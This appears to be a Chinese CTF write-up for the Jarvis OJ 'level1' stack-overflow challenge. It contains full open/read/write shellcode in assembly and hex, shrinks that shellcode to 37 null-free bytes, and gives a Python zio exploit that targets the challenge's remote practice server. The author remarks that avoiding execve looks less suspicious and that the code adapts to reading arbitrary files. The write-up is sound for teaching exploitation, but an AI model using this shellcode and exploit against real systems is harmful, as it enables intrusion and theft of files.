简介 :
漏洞程序 : https://dn.jarvisoj.com/challengefiles/level1.80eacdcd51aca92af7749d96efad7fb5
利用方式 : 栈溢出 (执行 shellcode)
远程主机 : pwn2.jarvisoj.com
端 口 : 9877
备 注 : 所有的程序以及利用代码都已经分享到了 https://coding.net/u/yihangwang/p/pwnme/git 中
有需要的小伙伴可以自行下载
分析 :
之前做过这道题(http://www.jianshu.com/p/d267577c7af1)
NX保护没有开启 , 而且也打印出了 buffer 的地址
因此可以注入shellcode , 之前的做法是注入 execve("/bin/sh") 的shellcode直接获取shell
今天家伟在做这道题 , 突然想到了一个新的思路 (不过这个思路并不是很通用...只是随便试试)
具体的思路是 :
并不调用 execve() 这个系统调用
而是假定 flag 就藏在可执行程序的同级目录下 , 文件名就叫 flag (嗯 , 一定是这样)
这样我们就可以来写 shellcode 直接读取这个文件并打印出来
这样有一个好处就是 , 并不会使用到 execve 这种非常敏感的系统调用
只使用 open , read , write 来实现 , 让目标主机的感觉更无害
shellcode :
global _start
_start:
; int open(const char *pathname, int flags);
mov edx, 0
mov ecx, 0 ; #DEFINE O_RDONLY 0
; 具体的宏定义可以这里查询 :
; http://lxr.free-electrons.com/source/include/asm-generic/fcntl.h?v=2.6.35#L8
; 也可以自己写个 C 程序打印出来看
push ecx
push "flag" ; nasm汇编器有一个好处就是可以直接 push 四字节的字符串 , 而不用转成 16 进制
mov ebx, esp
mov eax, 05H
int 80H
; ssize_t read(int fd, void *buf, size_t count);
mov edx, 0FFH ; 读 0xFF 个字节到栈上
mov ecx, esp
mov ebx, eax ; get fd
mov eax, 03H
int 80H
; ssize_t write(int fd, const void *buf, size_t count);
mov edx, 0FFH ; 打印栈上的 0xFF 个字节
mov ecx,esp
mov ebx,1
mov eax, 04H
int 80H
; exit
mov eax,01H
int 80H
机器码 :
sun@sun:~/pwnme/shellcode/15$ objdump -d shellcode
shellcode: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: ba 00 00 00 00 mov $0x0,%edx
8048065: b9 00 00 00 00 mov $0x0,%ecx
804806a: 51 push %ecx
804806b: 68 66 6c 61 67 push $0x67616c66
8048070: 89 e3 mov %esp,%ebx
8048072: b8 05 00 00 00 mov $0x5,%eax
8048077: cd 80 int $0x80
8048079: ba ff 00 00 00 mov $0xff,%edx
804807e: 89 e1 mov %esp,%ecx
8048080: 89 c3 mov %eax,%ebx
8048082: b8 03 00 00 00 mov $0x3,%eax
8048087: cd 80 int $0x80
8048089: ba ff 00 00 00 mov $0xff,%edx
804808e: 89 e1 mov %esp,%ecx
8048090: bb 01 00 00 00 mov $0x1,%ebx
8048095: b8 04 00 00 00 mov $0x4,%eax
804809a: cd 80 int $0x80
804809c: b8 01 00 00 00 mov $0x1,%eax
80480a1: cd 80 int $0x80
shellcode :
shellcode = "\xba\x00\x00\x00\x00\xb9\x00\x00"
"\x00\x00\x51\x68\x66\x6c\x61\x67"
"\x89\xe3\xb8\x05\x00\x00\x00\xcd"
"\x80\xba\xff\x00\x00\x00\x89\xe1"
"\x89\xc3\xb8\x03\x00\x00\x00\xcd"
"\x80\xba\xff\x00\x00\x00\x89\xe1"
"\xbb\x01\x00\x00\x00\xb8\x04\x00"
"\x00\x00\xcd\x80\xb8\x01\x00\x00"
"\x00\xcd\x80"
执行结果 :
Paste_Image.png Paste_Image.png优化shellcode :
可以看到上面用到的shellcode还是很长的(62 Bytes) , 因此我们本着高标准严要求的准则
对 shellcode 进行精简
1. 0 字节优化
2. 寄存器复用
3. 精简某些指令
(更多的优化技巧请参考 : Shellcode奇技淫巧汇总[持续更新] http://www.jianshu.com/p/a706ddc1d6bb)
Paste_Image.png
Paste_Image.png
Paste_Image.png
优化后的汇编程序和shellcode
shellcode.asm
global _start
_start:
; int open(const char *pathname, int flags);
xor ecx, ecx ; #DEFINE O_RDONLY 0
; 具体的宏定义可以这里查询 :
; http://lxr.free-electrons.com/source/include/asm-generic/fcntl.h?v=2.6.35#L8
; 也可以自己写个 C 程序打印出来看
push ecx
push "flag" ; nasm汇编器有一个好处就是可以直接 push 四字节的字符串 , 而不用转成 16 进制
mov ebx, esp
xor eax, eax
cdq
mov al, 05H
int 80H
; ssize_t read(int fd, void *buf, size_t count);
mov dl, 0FFH ; 读 0xFF 个字节到栈上
mov ecx, esp
mov ebx, eax ; get fd
mov al, 03H
int 80H
; ssize_t write(int fd, const void *buf, size_t count);
mov dl, 0FFH ; 打印栈上的 0xFF 个字节
xor ebx, ebx
mov bl,1
mov al, 04H
int 80H
Paste_Image.png
Paste_Image.png
可以看到经过优化后的 shellcode 只有 37 字节 , 而且没有 0 字节
整整减少了 25 字节 , 而且功能并没有变化
现在我们的 exploit.py 脚本 :
#!/usr/bin/env python
# encoding:utf-8
import zio
distance = 0x88 + 4
# shellcode = "\xba\x00\x00\x00\x00\xb9\x00\x00\x00\x00\x51\x68\x66\x6c\x61\x67\x89\xe3\xb8\x05\x00\x00\x00\xcd\x80\xba\xff\x00\x00\x00\x89\xe1\x89\xc3\xb8\x03\x00\x00\x00\xcd\x80\xba\xff\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xcd\x80"
shellcode = "\x31\xc9\x51\x68\x66\x6c\x61\x67\x89\xe3\x31\xc0\x99\xb0\x05\xcd\x80\xb2\xff\x89\xe1\x89\xc3\xb0\x03\xcd\x80\xb2\xff\x31\xdb\xb3\x01\xb0\x04\xcd\x80"
junk = "A" * (distance - len(shellcode))
# Io = zio.zio("./level1")
Io = zio.zio(("pwn2.jarvisoj.com", 9877))
line = Io.readline() # 接受到的数据为 : What's this:0xffe36e40?
address = zio.l32(int(line[len("What's this:"):-2], 16)) # 程序运行之后才可以得到
payload = shellcode + junk + address
Io.write(payload)
Io.interact()
Paste_Image.png
总结 :
在CTF比赛中 , 如果一道 pwn 可以栈溢出执行 shellcode
而且也可以假定 flag 就在当前目录下 , 那么就可以使用这个shellcode 进行读取
如果并不在当前目录 , 那么就对 shellcode.asm 进行一些简单地调整
就可以读取任意文件
推荐 :
关于如何编写长度很短的shellcode , 推荐一个中文视频 :
https://www.youtube.com/edit?o=U&video_id=VwTUIZiJ5m4
网友评论